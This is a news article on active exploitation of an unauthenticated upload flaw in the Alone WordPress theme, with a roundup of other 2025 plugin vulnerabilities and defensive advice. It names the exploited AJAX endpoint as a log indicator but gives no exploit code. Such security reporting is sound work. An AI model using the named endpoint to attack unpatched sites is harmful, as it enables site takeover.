Hackers Take Advantage of Major Vulnerability in WordPress Theme Globally

Last updated on by on Categories , .
Try Our Free Tools!
Master the web with Free Tools that work as hard as you do. From Text Analysis to Website Management, we empower your digital journey with expert guidance and free, powerful tools.
Let's Try Now!

A critical Remote Code Execution (RCE) vulnerability (CVE‑2025‑5394) has been identified in the Alone Charity Multipurpose WordPress Theme, particularly in versions 7.8.3 and earlier. This flaw is currently under active exploitation.

Reports indicate that over 120,000 attempts have been documented against more than 9,000 vulnerable websites. This alarming trend has enabled cybercriminals to inject malicious plugins and execute arbitrary code by taking advantage of unauthenticated upload capabilities.

Further compounding the situation, another vulnerability (CVE‑2025‑5393) facilitates arbitrary file deletion, greatly enhancing the potential for site takeover. In some instances, these vulnerabilities have been exploited in tandem with the Bears Backup plugin RCE (CVE‑2025‑5396), granting attackers even deeper access.

Other High-Profile WordPress Exploits in 2025

Security experts highlight that the exploitation of the Alone theme is merely a single instance among numerous recent attacks of similar gravity. In the initial months of 2025, attackers successfully exploited at least four prominent plugins and themes that were revealed to have critical vulnerabilities in 2024 but remained unpatched:

  • WordPress Automatic Plugin (CVE‑2024‑27956): A SQL injection vulnerability affecting data exports, with over 6,500 blocked attempts documented.
  • Startklar Elementor Addons (CVE‑2024‑4345): An unauthenticated file upload oversight permitted unauthorized plugin installations, paving the way for backdoor creation.
  • Bricks Theme (CVE‑2024‑25600): RCE via the REST API route allowed for unauthorized execution of PHP scripts.
  • GiveWP Donation Plugin (CVE‑2024‑8353): PHP object injection vulnerabilities on donation forms facilitated complete site compromises.

Emerging plugin challenges have also surfaced in 2025:

  • Post SMTP Plugin (CVE‑2025‑24000): A breach of access control that exposed email logs to lower-privileged users, while also enabling unauthorized admin password resets. An estimated 160,000 sites remain unpatched.
  • BuddyBoss Platform Pro (CVE‑2025‑1909): A vulnerability that allowed Apple OAuth bypass, enabling the impersonation of privileged users.
  • PGS Core Plugin (CVE‑2025‑0855): A risk of PHP object injection is present in versions up to 5.8.0.
  • PeproDev Ultimate Profile Solutions (CVE‑2025‑3844): An authentication bypass enabling unauthorized admin login access.
  • Simple Payment, FunnelKit, Custom APIs (CVE‑2025‑4334 / 6065 / 4973 / 1562 / 5486 / 5701): Multiple vulnerabilities related to privilege escalation and file deletion were discovered in plugins such as FunnelKit and the Golo Travel theme.

Widespread Impacts and Emerging Attack Tactics

More than 20,000 WordPress websites have been compromised due to malicious JavaScript backdoors concealed within the mu-plugins directory. This has enabled stealthy persistence strategies and visitor redirect attacks.

A significant supply-chain compromise involving the Gravity Forms plugin in July 2025 disseminated malware through legitimate downloads, impacting users of versions 2.9.11.1 and 2.9.12.

Moreover, the enduring DollyWay campaign continues to wreak havoc globally, redirecting traffic to adware-laden domains and exploiting various plugin and theme vulnerabilities.

Urgent Security Recommendations

  • Upgrade the Alone theme to version 7.8.5 without delay.
  • Examine logs for any suspicious POST requests directed to /wp-admin/admin-ajax.php?action=alone_import_pack_install_plugin.
  • Immediately patch or disable plugins with known critical CVEs.
  • Conduct a thorough audit of AJAX logs for any suspicious endpoints.
  • Review administrator accounts and eliminate unauthorized users promptly.
  • Scan the mu-plugins directory for any rogue PHP or JavaScript files.
  • Implement firewalls, enable multi-factor authentication, and closely monitor plugin installations.

The presence of unpatched plugins and themes constitutes a significant vulnerability within the WordPress ecosystem. Hackers have exploited numerous critical vulnerabilities within a mere 24 hours of their public disclosure throughout 2024 and 2025, employing AI-driven scanners to expedite attacks on a grand scale.

Source link: Techjuice.pk.

Disclosure: This article is for general information only and is based on publicly available sources. We aim for accuracy but can't guarantee it. The views expressed are the author's and may not reflect those of the publication. Some content was created with help from AI and reviewed by a human for clarity and accuracy. We value transparency and encourage readers to verify important details. This article may include affiliate links. If you buy something through them, we may earn a small commission — at no extra cost to you. All information is carefully selected and reviewed to ensure it's helpful and trustworthy.

Reported By

RS Web Solutions

We provide the best tutorials, reviews, and recommendations on all technology and open-source web-related topics. Surf our site to extend your knowledge base on the latest web trends.
Share the Love
Related News Worth Reading
 
Try Our Free Tools!
Master the web with Free Tools that work as hard as you do. From Text Analysis to Website Management, we empower your digital journey with expert guidance and free, powerful tools.
Let's Try Now!

We provide the best tutorials, reviews, and recommendations on all technology and open-source web-related topics. Surf our site to extend your knowledge base on the latest web trends.

Trustpilot
Content Safety

HERO

rswebsols.com
Trustworthy

Approved by Sur.ly

Important Links
Free Tools
Categories
Popular Tags
Our Partners
Copyright © 2025 - RS Web Solutions (RSWEBSOLS) | All Rights Reserved. Image credit: Unsplash | Pixabay | Pexels | Freepik.